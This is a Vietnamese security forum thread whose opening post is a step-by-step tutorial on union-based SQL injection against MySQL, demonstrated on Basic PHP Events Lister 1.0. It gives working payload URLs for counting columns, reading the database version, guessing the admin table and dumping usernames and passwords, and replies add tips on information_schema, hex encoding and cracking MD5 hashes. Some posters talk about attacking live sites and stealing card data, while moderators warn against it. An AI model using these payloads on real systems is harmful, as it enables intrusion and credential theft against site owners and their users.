[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Go down

[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Bài gửi by Admin on Thu Sep 13, 2018 11:24 am

seamoun
Advisor
Joined: 04/01/2002 14:05:10
Bài gởi: 357
Offline
[Profile] [PM]
I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL
Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0

Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1
Thực hiện thêm dấu ' sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1'
Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau:

Code:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37


Đối tượng khai thác SQL Injection ở đây là "Basic PHP Events Lister 1.0". Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì?
Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này
bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau.
(Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được).
Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by <num>. Thực hiện tăng dần <num>. Khi thực hiện order by <num>, nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng <num> cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường.

Lần lượt mình thử:
Code:
http://seamoun.com/phpevents/event.php?id=1 order by 1
http://seamoun.com/phpevents/event.php?id=1 order by 2
http://seamoun.com/phpevents/event.php?id=1 order by 3
...

http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK)
http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)


Như vậy truy vấn SQL với URL trên là 15 trường (field)
Đến đây có thể điều tra phiên bản SQL, user với lệnh sau
Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1

http://seamoun.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1



Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như
manager, admin, administrator, systemlogin, ... (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select ... nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau:

Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)


Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được.
Có thể đoán tên trường trong bảng admin như là username,uname,user, ... pass, passwd, password, pword, .... (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau

Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

http://seamoun.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)


Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với
2 trường uname và pword + tên bảng là admin
Thực hiện lệnh:

Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.


Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass

Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword.
0x3a---> dấu ":". Concat sẽ thực hiện cộng chuỗi

Đến đây ta đã có thông tin uname và pword.
Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau

Code:
Điều tra thông tin bảng:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns


Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, ... để không bị lỗi khi khai thác như:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin

II. Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 (milw0rm.com)
Đây chỉ là hướng dẫn cơ bản nhất về khai thác SQL - Injection đối với MySQL. Các bạn demo thì install trên máy mình để kiểm tra, đừng đi hack người khác à nha.

--vickigroup.com--
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 01/10/2008 05:53:34 (+0700) | #2 | 153463
seamoun
Advisor
Joined: 04/01/2002 14:05:10
Bài gởi: 357
Offline
[Profile] [PM]
Trên milw0rm có bài viết (Introduction to SQL injection - gửi ngày 2008-09-28) : http://milw0rm.com/papers/225. Có giới thiệu thêm một số hàm và một số phương thức có thể lấy thông tin về table, column như sử dụng group_concat, ...
Các bạn có thể đọc thêm để tham khảo smilie
--vickigroup.com--
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 01/10/2008 11:09:50 (+0700) | #3 | 153488
flier_vn
Member
[Minus] 0 [Plus]
Joined: 15/07/2008 01:13:39
Bài gởi: 28
Offline
[Profile] [PM]
Em có trường hợp này, mong a e góp ý hướng đi !

Em đã có được password của các user mysql ! Nhưng dạng "localhost@user" vậy ngoài việc mò trùng pass với các thứ khác ra thì còn có hướng nào nữa ko ???

bài viết http://milw0rm.com/papers/225 vẫn chưa có gì mới lạ !
Thx !
MerChant.Vn - Website học hỏi, trao đổi thảo luận về kinh doanh.

DànhChoBé.VN - Chuyên bán đồ chơi chất lượng, thương hiệu Fisher price, Disney, Thomas & Friends
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 07/10/2008 18:23:56 (+0700) | #4 | 154254
CK
Member
[Minus] 0 [Plus]
Joined: 17/02/2008 03:14:35
Bài gởi: 22
Đến từ: vn
Offline
[Profile] [PM]
Hình như có thêm nhiều cái hay ho trong bảng information_schema của mysql 5 mà anh? Với cả em thấy select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ... không hay bằng select 1,2,3 .... smilie
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 07/10/2008 21:35:08 (+0700) | #5 | 154260
[Avatar]
louisnguyen27
Member
[Minus] 0 [Plus]
Joined: 12/08/2008 18:04:41
Bài gởi: 321
Offline
[Profile] [PM]
@seamoun như vậy social engineering là rất quan trọng trong việc khai thác lỗi. Có khi nào đoán hoài mà vẫn không ra tên bảng và các trường không?
Q+SBtZW1iZXIgb2YgSFZ+B
Back to Linux soon!!!
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 09/10/2008 23:57:29 (+0700) | #6 | 154610
KuNghi
Member
[Minus] 0 [Plus]
Joined: 26/07/2007 02:18:00
Bài gởi: 11
Offline
[Profile] [PM]
Tớ có khai thác thì tớ tìm version SQK trước Nếu SQL Version
<5 : thì đoán table & column

>5 thì truy vấn đến table

information_schema.tables where table_schema=database()


để tìm table smilie thôi, cứ vậy tìm đc table thì lấy columns

information_schema.columns where table_name=[ten table]


[ten_table] : cần hex đi smilie
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 10/11/2008 04:27:25 (+0700) | #7 | 158253
[Avatar]
h0ainiemdauyeu
Member
[Minus] 0 [Plus]
Joined: 08/11/2008 23:40:35
Bài gởi: 1
Offline
[Profile] [PM] [Yahoo!]
lỗi này bây giờ đã fix hết rồi ,kiếm site bị lỗi kiểu này thực tập khó quá smilie
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 10/11/2008 05:01:40 (+0700) | #8 | 158257
[Avatar]
xnohat
Moderator
Joined: 30/01/2005 13:59:19
Bài gởi: 1210
Đến từ: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Ko lẽ cứ thực tập phải kiếm site bị bug ?
Để gắn lên dòng hacked by xxx cho nó sướng chăng ?
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: https://www.facebook.com/hvaonline
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 19/02/2009 05:28:03 (+0700) | #9 | 169968
khovingu89
Member
[Minus] 0 [Plus]
Joined: 24/02/2008 22:08:27
Bài gởi: 14
Offline
[Profile] [PM]
lỗi này giờ dính vẫn rất nhiều.......Bao nhiêu công ty việt nam dính chỉ nhưng website cá nhân ai hay lần mò thì ít bị hơn
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 05/03/2009 17:27:52 (+0700) | #10 | 171987
tinios
Member
[Minus] 0 [Plus]
Joined: 27/02/2009 18:00:44
Bài gởi: 22
Offline
[Profile] [PM]
mọi người cho em hỏi giả sử em có các bảng như sau
Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo

em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy?
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 06/03/2009 04:55:20 (+0700) | #11 | 172027
FDN
Member
[Minus] 0 [Plus]
Joined: 20/11/2008 13:54:50
Bài gởi: 6
Offline
[Profile] [PM]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 28/05/2009 08:26:06 (+0700) | #12 | 182166
congrallion
Member
[Minus] 0 [Plus]
Joined: 09/02/2007 18:05:09
Bài gởi: 4
Offline
[Profile] [PM]
tinios wrote:
mọi người cho em hỏi giả sử em có các bảng như sau
Code:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,bangkhen,chitiethd,codong,codong_EN,counter,download,download_EN,hoadon,khachhang,lienhe,link,menudownlo

em sử dụng câu truy vấn http://www.site.com/index.php/id=6 union select 1,2,3,column_name,5 from information_shema.columns where table_name=""-- ==> thì nó báo lổi vậy thì em sai ở bước nào vậy?


tớ nghĩ cậu nên hex cái table_name lên thì được á.


Code:
......from information_shema.columns where table_name=0x[table_name đã hex]

[Up] [Print Copy]


[Hỏi đáp] Re: Hướng dẫn khai thác SQL Injection đối với MySQL 28/05/2009 13:59:08 (+0700) | #13 | 182195
thanhluan13
Member
[Minus] 0 [Plus]
Joined: 20/09/2006 15:47:05
Bài gởi: 5
Offline
[Profile] [PM]
Lỗi này có cách hack lâu rồi mà, cái này ứng dụng vào get shop để lấy cc chùa đây mà. Bây giờ công nhận là nhiều trang còn lỗi này, nhưng sau khi thâm nhập, lấy được thông tin từ Database thì mật khẩu admin bị mã hóa hết. Các thông tin cần bảo mật cũng bị thay thế. VD : 5487921635487= "/////////////". Bác nào đưa ra cách thâm nhập chiếm đoạt toàn quyền thông tin. Dành cho newbie nhé. Thanks !
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 04/06/2009 22:34:51 (+0700) | #14 | 182775
MrKenichi
Member
[Minus] 0 [Plus]
Joined: 10/11/2007 14:12:49
Bài gởi: 7
Offline
[Profile] [PM]
firefox cho addons là hackbar rất tiện khi sql injection(inbound) . Load URL và chèn union select column ...
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 05/06/2009 00:59:51 (+0700) | #15 | 182787
nbthanh
HVA Friend
Joined: 21/12/2001 14:51:51
Bài gởi: 429
Offline
[Profile] [PM]
Bài viết rất hay và xúc tích! Đây là 1 ví dụ kinh điển nhất cho
- "muốn hack thì phải GIỎI những thứ CĂN BẢN / NỀN TẢNG trước như lập trình, SQL, v.v..."
- và "khi đã GIỎI những thứ CĂN BẢN / NỀN TẢNG rồi thì tự nhiên sẽ biết hack"

Chẳng hạn như không biết lập trình, không biết SQL, không biết những thứ nền tảng này thì có biết site bị lỗi cũng không biết đường nào mà khai thác.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 08/06/2009 22:54:22 (+0700) | #16 | 183054
clackent
Member
[Minus] 0 [Plus]
Joined: 29/08/2008 22:55:41
Bài gởi: 7
Offline
[Profile] [PM]
có điều này em chưa hiểu là tại sao lúc ta dùng lệnh order by 10 ==true
vậy mà khi dùng union select 1,2,3,4,5,6,7,8,9,10-- thì ra
The used SELECT statements have a different number of columns.
phải chăng cái này thì chỉ dùng blind sql .
hình như cái này chỉ có MySQL <5 thì bị đúng không ah.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 09/06/2009 02:54:21 (+0700) | #17 | 183074
[Avatar]
hoahongtim
Researcher
Joined: 15/07/2002 02:59:49
Bài gởi: 156
Đến từ: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
MySQL không support multi query, khi bạn order thì nó true, nhưng khi dùng UNION thì có lẽ là không được, với dạng multi query thì có lẽ dùng kỷ thuật blind là hợp lý. MySQLI thì lại có multi query smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/06/2009 13:36:38 (+0700) | #18 | 183883
khovingu89
Member
[Minus] 0 [Plus]
Joined: 24/02/2008 22:08:27
Bài gởi: 14
Offline
[Profile] [PM]
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/06/2009 16:02:11 (+0700) | #19 | 183886
flier_vn
Member
[Minus] 0 [Plus]
Joined: 15/07/2008 01:13:39
Bài gởi: 28
Offline
[Profile] [PM]
khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin


smilie Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu !

Chân thành đấy smilie
MerChant.Vn - Website học hỏi, trao đổi thảo luận về kinh doanh.

DànhChoBé.VN - Chuyên bán đồ chơi chất lượng, thương hiệu Fisher price, Disney, Thomas & Friends
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/06/2009 21:26:10 (+0700) | #20 | 183901
[Avatar]
quanta
Moderator
Joined: 28/07/2006 14:44:21
Bài gởi: 7265
Đến từ: $ locate `whoami`
Offline
[Profile] [PM]
flier_vn wrote:
khovingu89 wrote:
SQL bị lỗi hack cũng giễ thôi mà khó là khó cái đoạn crack md5 và tìm link admin


smilie Đúng là "Giễ" ! Bạn nên xem lại chính tả và học nhìu hơn về lập trình rồi hẳn tham gia phát bỉu !

Chân thành đấy smilie

Nên dùng tiếng Việt cho đúng, đừng dùng những từ biến thái như thế (ít ra là trên diễn đàn này).

Thật lòng đấy.
Let's build on a great foundation!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 15/07/2009 23:48:19 (+0700) | #21 | 186359
[Avatar]
xichjum
Member
[Minus] 0 [Plus]
Joined: 14/07/2009 11:02:58
Bài gởi: 9
Offline
[Profile] [PM] [Yahoo!]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 15/07/2009 23:52:17 (+0700) | #22 | 186360
[Avatar]
xichjum
Member
[Minus] 0 [Plus]
Joined: 14/07/2009 11:02:58
Bài gởi: 9
Offline
[Profile] [PM] [Yahoo!]
Bài viết này được chỉnh thành dạng "ẩn" vì đã vi phạm nội quy của diễn đàn hoặc đang được điều chỉnh để thích hợp với nội quy của diễn đàn.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 16/07/2009 00:11:53 (+0700) | #23 | 186362
[Avatar]
hoahongtim
Researcher
Joined: 15/07/2002 02:59:49
Bài gởi: 156
Đến từ: Underground
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ai lại chơi chuyện "xúi" người ta hack web này web nọ vậy smilie Sao bạn không tự mình làm đi smilie, còn nếu nhờ ai đó thì nên private message đi smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 16/07/2009 01:17:05 (+0700) | #24 | 186377
[Avatar]
yeucodon
Member
[Minus] 0 [Plus]
Joined: 22/03/2008 11:25:51
Bài gởi: 39
Offline
[Profile] [PM]
ai lại đi phá thế bác seamoun nói rồi mà coó làm thì trên máy mình thôi chứ
sống trong đời sống, cần có một tấm lòng
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 16/07/2009 22:44:47 (+0700) | #25 | 186478
[Avatar]
xichjum
Member
[Minus] 0 [Plus]
Joined: 14/07/2009 11:02:58
Bài gởi: 9
Offline
[Profile] [PM] [Yahoo!]
anh em cho mình hởi có khi nào hack hai trang web cùng kiểu mà lòi ra hai mã được mã hóa khac nhau không.minh hack hai trang ma một mã thì là md5 còn mã kia thi carck nó bằng md5 thì không được anh em có cách nào chỉ dùm mình với thank! 3fa97d17baea21ddfb7e5ba1a8f34e3e nó đây smilie smilie smilie smilie smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 16/07/2009 22:52:57 (+0700) | #26 | 186481
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
xichjum wrote:
anh em cho mình hởi có khi nào hack hai trang web cùng kiểu mà lòi ra hai mã được mã hóa khac nhau không.minh hack hai trang ma một mã thì là md5 còn mã kia thi carck nó bằng md5 thì không được anh em có cách nào chỉ dùm mình với thank! 3fa97d17baea21ddfb7e5ba1a8f34e3e nó đây smilie smilie smilie smilie smilie


Thử tự hỏi "hack cùng một kiểu" có quyết định sự khác nhau của cơ chế hashing trên 2 site khác nhau hay không?

Đưa cái hash lên để làm chi vậy?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 03:54:12 (+0700) | #27 | 186515
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
phần lấy password nó ra thế này e8772a36a8f284c2060a70d16cb7d03a và mình đã dùng thử để truy cập nhưng không được chắc là password đã bị mã hóa rồi. vậy làm sao để tìm pass thật đây? các pro giúp dùm. cũng chỉ test chứ không có ý phá người ta.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 04:34:34 (+0700) | #28 | 186523
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
phần lấy password nó ra thế này e8772a36a8f284c2060a70d16cb7d03a và mình đã dùng thử để truy cập nhưng không được chắc là password đã bị mã hóa rồi. vậy làm sao để tìm pass thật đây? các pro giúp dùm. cũng chỉ test chứ không có ý phá người ta.


Chủ đề này là chủ đề "giải mã" hay là chủ đề nói về mysql injection vậy?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 08:20:17 (+0700) | #29 | 186548
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
thì mình không hề nhờ giải mã mà smilie ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 18:28:11 (+0700) | #30 | 186572
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
thì mình không hề nhờ giải mã mà smilie ý mình ở đây là mình làm theo hướng dẫn nhưng không ra password bình thường mà lại ra password đã bị mã hóa. và mình không hiểu lý do tại sao lại vậy. không lẽ kết quả đạt được lại mang tính hên xui .... (xui thì ra pw đã bị mã hóa như mình)


Nếu mật khẩu được "mã hóa" và lưu trong CSDL ở dạng "mã hóa" thì bồ "lấy" nó ra, nó cũng ở dạng "mã hóa" chớ có gì đâu mà khó hiểu?

99.99999% các ứng dụng thời buổi này không lưu mật khẩu ở dạng cleartext mà thường được "mã hóa". Đây là chuyện thông thường mà thôi. Chẳng có gì hên xui cả.
What bringing us together is stronger than what pulling us apart.

Admin
Admin

Tổng số bài gửi : 69
Join date : 13/09/2018

Xem lý lịch thành viên http://hvaonline.forumvi.com

Về Đầu Trang Go down

Re: [Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL

Bài gửi by Admin on Thu Sep 13, 2018 11:25 am

constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
nói như admin thì theo em hiểu khai thác SQL Injection bây h 99.99999% thu được password được "mã hóa" ? không lẽ cách thâm nhập này đã lỗi thời? newbie có zi ko đúng xin thứ lỗi.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 18:57:54 (+0700) | #32 | 186574
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
nói như admin thì theo em hiểu khai thác SQL Injection bây h 99.99999% thu được password được "mã hóa" ? không lẽ cách thâm nhập này đã lỗi thời? newbie có zi ko đúng xin thứ lỗi.


Cách thâm nhập nào thuộc dạng step-by-step và người thâm nhập không hiểu cấu trúc của ứng dụng mình đang thâm nhập thì lúc nào cũng lỗi thời cả. Ngay cả khi cái "step-by-step" ấy vừa được ra đời, nó đã... lỗi thời.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 21:31:52 (+0700) | #33 | 186578
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ?
anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ?
mong được chỉ giáo thêm. cám ơn!
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 17/07/2009 23:39:40 (+0700) | #34 | 186593
lyhuuloi
Elite Member
[Minus] 0 [Plus]
Joined: 04/04/2003 11:29:17
Bài gởi: 90
Đến từ: TP HCM
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ?
anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ?
mong được chỉ giáo thêm. cám ơn!

Bạn nói đúng smilie Nhưng vấn đề bạn lấy được mã md5 rồi mà không biết phải làm gì với nó thì đó là lúc mà bạn phải tìm hiểu về cấu trúc của website đang thâm nhập smilie

Bạn phải hiểu được cách tạo ra mã md5 đó, ví dụ được md5 mấy lần, mã md5 này có liên quan đến một chuỗi nào đó để tạo ra nó không,... etc.

và quan trọng là hack thì phải biết mình cần cái gì,.. giống như kiểu muốn ăn thì lăn vào bếp vậy smilie

I'm only a newbie, dont hurt me, plz smilie
http://lyhuuloi.com smilie
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/07/2009 00:38:13 (+0700) | #35 | 186604
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
constructor_87 wrote:
em nghĩ rằng SQL Injection là bug trong mySQL và mình khai thác nó, tất nhiên sử dụng code mySQL để thâm nhập rồi. ngoài ra còn phải hiểu cấu trúc gì thêm ?
anh nói : "cấu trúc của ứng dụng mình đang thâm nhập" ở đây là gì? có thể nói rõ hơn 1 chút không ạ?
mong được chỉ giáo thêm. cám ơn!


Bồ nên hiểu thêm thế nào là sql injection và không nên "nghĩ" mà không rõ tính chất của nó.

mySQL hoặc bất cứ CSDL nào chỉ là CSDL. Ta truy vấn cái gì, nó trả lời cái nấy. Ta truy vấn sai, nó từ chối cung cấp thông tin. SQL injection xảy bởi vì ứng dụng web "bị" dùng để truy vấn những thứ lẽ ra không nên truy vấn. Đây là lỗi của ứng dụng web chớ chẳng phải lỗi của CSDL bởi vì nó không kiểm soát "cái gì" được dùng để truy vấn đến CSDL.

Riêng khoản "cấu trúc của ứng dụng mình đang thâm nhập" thì khoản này khá rộng. Ví dụ, bồ đang thử SQL inject để "mò" lấy thông tin của cột chứa mật khẩu và bồ biết rằng ứng dụng web bồ đang tấn công là vBulletin Forum chẳng hạn. Để hiểu cấu trúc của nó, trước tiên bồ cần có source của vBulletin và nghiên cứu cơ chế tạo và lưu mật khẩu. Nếu biết trước rằng vBulletin hash mật khẩu hai lần bằng MD5 thì có lẽ bồ không phải tốn thời gian để thực hiện SQL Injection để thâu lượm được một mới MD5 hash kia.

Điều căn bản nhất cần ghi nhớ: muốn exploit cái gì thì phải nắm vững cái ấy.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/07/2009 02:35:38 (+0700) | #36 | 186610
constructor_87
Member
[Minus] 0 [Plus]
Joined: 30/06/2007 00:53:47
Bài gởi: 23
Offline
[Profile] [PM]
@lyhuuloi: mới đọc mấy bài của bác bên phần lập trình web ^^! ma em có commen bên blog của bác rồi. mong bác sớm hồi âm smilie

@conmale: cám ơn bác (ko biết em đủ tuổi chưa smilie ) conmale nhiều! em đã thông thoáng hơn rồi smilie và em cũng đã và đang thực hiện "Điều căn bản nhất cần ghi nhớ" của bác dặn đây (trong đó nhờ công của bác nhiều đấy ạ ^^! )
[Up] [Print Copy]


[Bài viết] Hướng dẫn khai thác SQL Injection đối với MySQL 18/07/2009 02:55:05 (+0700) | #37 | 186612
lyhuuloi
Elite Member
[Minus] 0 [Plus]
Joined: 04/04/2003 11:29:17
Bài gởi: 90
Đến từ: TP HCM
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
